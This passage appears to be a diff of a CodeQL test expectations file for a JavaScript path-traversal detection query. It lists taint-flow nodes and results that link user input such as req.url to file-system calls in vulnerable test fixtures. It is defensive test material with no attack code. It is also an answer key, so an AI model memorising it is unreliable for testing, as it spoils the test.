t('/')) | -| normalizedPaths.js:408:38:408:48 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:408:38:408:59 | req.que ... it('/') | semmle.label | req.que ... it('/') | -| normalizedPaths.js:412:7:412:46 | path | semmle.label | path | -| normalizedPaths.js:412:14:412:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | -| normalizedPaths.js:412:35:412:45 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:415:19:415:22 | path | semmle.label | path | -| normalizedPaths.js:426:21:426:24 | path | semmle.label | path | -| other-fs-libraries.js:9:7:9:48 | path | semmle.label | path | -| other-fs-libraries.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:9:24:9:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:11:19:11:22 | path | semmle.label | path | -| other-fs-libraries.js:12:27:12:30 | path | semmle.label | path | -| other-fs-libraries.js:13:24:13:27 | path | semmle.label | path | -| other-fs-libraries.js:14:27:14:30 | path | semmle.label | path | -| other-fs-libraries.js:16:34:16:37 | path | semmle.label | path | -| other-fs-libraries.js:17:35:17:38 | path | semmle.label | path | -| other-fs-libraries.js:19:56:19:59 | path | semmle.label | path | -| other-fs-libraries.js:24:35:24:38 | path | semmle.label | path | -| other-fs-libraries.js:38:7:38:48 | path | semmle.label | path | -| other-fs-libraries.js:38:14:38:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:38:14:38:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| other-fs-libraries.js:38:24:38:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:40:35:40:38 | path | semmle.label | path | -| other-fs-libraries.js:41:50:41:53 | path | semmle.label | path | -| other-fs-libraries.js:42:53:42:56 | path | semmle.label | path | -| other-fs-libraries.js:49:7:49:48 | path | semmle.label | path | -| other-fs-libraries.js:49:14:49:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:49:14:49:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:49:24:49:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:51:19:51:22 | path | semmle.label | path | -| other-fs-libraries.js:52:24:52:27 | path | semmle.label | path | -| other-fs-libraries.js:54:36:54:39 | path | semmle.label | path | -| other-fs-libraries.js:55:36:55:39 | path | semmle.label | path | -| other-fs-libraries.js:57:46:57:49 | path | semmle.label | path | -| other-fs-libraries.js:59:39:59:42 | path | semmle.label | path | -| other-fs-libraries.js:62:43:62:46 | path | semmle.label | path | -| other-fs-libraries.js:63:51:63:54 | path | semmle.label | path | -| other-fs-libraries.js:68:7:68:48 | path | semmle.label | path | -| other-fs-libraries.js:68:14:68:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:68:14:68:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| other-fs-libraries.js:68:24:68:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:70:19:70:22 | path | semmle.label | path | -| other-fs-libraries.js:71:10:71:13 | path | semmle.label | path | -| other-fs-libraries.js:72:15:72:18 | path | semmle.label | path | -| other-fs-libraries.js:73:8:73:11 | path | semmle.label | path | -| other-fs-libraries.js:75:15:75:15 | x | semmle.label | x | -| other-fs-libraries.js:76:19:76:19 | x | semmle.label | x | -| other-fs-libraries.js:81:7:81:48 | path | semmle.label | path | -| other-fs-libraries.js:81:14:81:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:81:14:81:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:81:14:81:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:81:24:81:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:83:16:83:19 | path | semmle.label | path | -| prettier.js:6:11:6:28 | p | semmle.label | p | -| prettier.js:6:13:6:13 | p | semmle.label | p | -| prettier.js:7:28:7:28 | p | semmle.label | p | -| prettier.js:11:44:11:44 | p | semmle.label | p | -| pupeteer.js:5:9:5:71 | tainted | semmle.label | tainted | -| pupeteer.js:5:19:5:71 | "dir/" ... t.data" | semmle.label | "dir/" ... t.data" | -| pupeteer.js:5:28:5:53 | parseTo ... t).name | semmle.label | parseTo ... t).name | -| pupeteer.js:9:28:9:34 | tainted | semmle.label | tainted | -| pupeteer.js:13:37:13:43 | tainted | semmle.label | tainted | -| sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | semmle.label | req.par ... spaceId | -| sharedlib-repro.js:21:27:21:34 | filepath | semmle.label | filepath | -| sharedlib-repro.js:22:18:22:25 | filepath | semmle.label | filepath | -| tainted-access-paths.js:6:7:6:48 | path | semmle.label | path | -| tainted-access-paths.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:6:14:6:43 | url.par ... 
).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:8:19:8:22 | path | semmle.label | path | -| tainted-access-paths.js:10:7:10:36 | obj | semmle.label | obj | -| tainted-access-paths.js:10:33:10:36 | path | semmle.label | path | -| tainted-access-paths.js:12:19:12:21 | obj | semmle.label | obj | -| tainted-access-paths.js:12:19:12:25 | obj.sub | semmle.label | obj.sub | -| tainted-access-paths.js:26:19:26:21 | obj | semmle.label | obj | -| tainted-access-paths.js:26:19:26:26 | obj.sub3 | semmle.label | obj.sub3 | -| tainted-access-paths.js:29:21:29:23 | obj | semmle.label | obj | -| tainted-access-paths.js:29:21:29:28 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:30:23:30:25 | obj | semmle.label | obj | -| tainted-access-paths.js:30:23:30:30 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:31:23:31:25 | obj | semmle.label | obj | -| tainted-access-paths.js:31:23:31:30 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:39:7:39:48 | path | semmle.label | path | -| tainted-access-paths.js:39:14:39:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:39:14:39:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:39:24:39:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:40:23:40:26 | path | semmle.label | path | -| tainted-access-paths.js:48:7:48:48 | path | semmle.label | path | -| tainted-access-paths.js:48:14:48:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:48:14:48:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:48:14:48:48 | url.par ... 
ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:48:24:48:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:49:10:49:13 | path | semmle.label | path | -| tainted-promise-steps.js:6:7:6:48 | path | semmle.label | path | -| tainted-promise-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-promise-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-promise-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-promise-steps.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-promise-steps.js:7:10:7:30 | Promise ... e(path) [PromiseValue] | semmle.label | Promise ... e(path) [PromiseValue] | -| tainted-promise-steps.js:7:26:7:29 | path | semmle.label | path | -| tainted-promise-steps.js:10:23:10:33 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:11:19:11:35 | await pathPromise | semmle.label | await pathPromise | -| tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | -| tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | -| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| 
tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | -| tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| tainted-string-steps.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-string-steps.js:8:18:8:21 | path | semmle.label | path | -| tainted-string-steps.js:8:18:8:34 | path.substring(4) | semmle.label | path.substring(4) | -| tainted-string-steps.js:9:18:9:21 | path | semmle.label | path | -| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | semmle.label | path.substring(0, i) | -| tainted-string-steps.js:10:18:10:21 | path | semmle.label | path | -| tainted-string-steps.js:10:18:10:31 | path.substr(4) | semmle.label | path.substr(4) | -| tainted-string-steps.js:11:18:11:21 | path | semmle.label | path | -| tainted-string-steps.js:11:18:11:30 | path.slice(4) | semmle.label | path.slice(4) | -| tainted-string-steps.js:13:18:13:21 | path | semmle.label | path | -| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | semmle.label | path.concat(unknown) | -| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | semmle.label | unknown.concat(path) | -| tainted-string-steps.js:14:33:14:36 | path | semmle.label | path | -| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | semmle.label | unknown ... 
, path) | -| tainted-string-steps.js:15:42:15:45 | path | semmle.label | path | -| tainted-string-steps.js:17:18:17:21 | path | semmle.label | path | -| tainted-string-steps.js:17:18:17:28 | path.trim() | semmle.label | path.trim() | -| tainted-string-steps.js:18:18:18:21 | path | semmle.label | path | -| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | semmle.label | path.toLowerCase() | -| tainted-string-steps.js:22:18:22:21 | path | semmle.label | path | -| tainted-string-steps.js:22:18:22:32 | path.split('/') | semmle.label | path.split('/') | -| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | semmle.label | path.split('/')[i] | -| tainted-string-steps.js:23:18:23:21 | path | semmle.label | path | -| tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | semmle.label | path.split(/\\//) | -| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | semmle.label | path.split(/\\//)[i] | -| tainted-string-steps.js:24:18:24:21 | path | semmle.label | path | -| tainted-string-steps.js:24:18:24:32 | path.split("?") | semmle.label | path.split("?") | -| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | semmle.label | path.split("?")[0] | -| tainted-string-steps.js:26:18:26:21 | path | semmle.label | path | -| tainted-string-steps.js:26:18:26:36 | path.split(unknown) | semmle.label | path.split(unknown) | -| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | semmle.label | path.sp ... hatever | -| tainted-string-steps.js:27:18:27:21 | path | semmle.label | path | -| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | semmle.label | path.split(unknown) | -| torrents.js:5:6:5:38 | name | semmle.label | name | -| torrents.js:5:13:5:38 | parseTo ... t).name | semmle.label | parseTo ... t).name | -| torrents.js:6:6:6:45 | loc | semmle.label | loc | -| torrents.js:6:12:6:45 | dir + " ... t.data" | semmle.label | dir + " ... 
t.data" | -| torrents.js:6:24:6:27 | name | semmle.label | name | -| torrents.js:7:25:7:27 | loc | semmle.label | loc | -| typescript.ts:9:7:9:48 | path | semmle.label | path | -| typescript.ts:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | -| views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | +#select +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. 
| TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. 
| TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... 
c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. 
| TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. 
| TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... 
'), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | +| handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | +| handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | +| normalizedPaths.js:13:19:13:22 | path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:13:19:13:22 | path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:14:19:14:29 | './' + path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:14:19:14:29 | './' + path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:15:19:15:38 | path + '/index.html' | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:15:19:15:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:16:19:16:53 | pathMod ... 
.html') | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:16:19:16:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:17:19:17:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:23:19:23:22 | path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:23:19:23:22 | path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:24:19:24:29 | './' + path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:24:19:24:29 | './' + path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:25:19:25:38 | path + '/index.html' | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:25:19:25:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:26:19:26:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:27:19:27:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:36:19:36:22 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:36:19:36:22 | path | This path depends on a $@. 
| normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | +| normalizedPaths.js:41:21:41:24 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:41:21:41:24 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | +| normalizedPaths.js:59:19:59:22 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:59:19:59:22 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:63:19:63:38 | path + "/index.html" | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:63:19:63:38 | path + "/index.html" | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:68:21:68:24 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:68:21:68:24 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:78:22:78:25 | path | normalizedPaths.js:73:42:73:55 | req.query.path | normalizedPaths.js:78:22:78:25 | path | This path depends on a $@. | normalizedPaths.js:73:42:73:55 | req.query.path | user-provided value | +| normalizedPaths.js:87:29:87:32 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:87:29:87:32 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | +| normalizedPaths.js:90:31:90:34 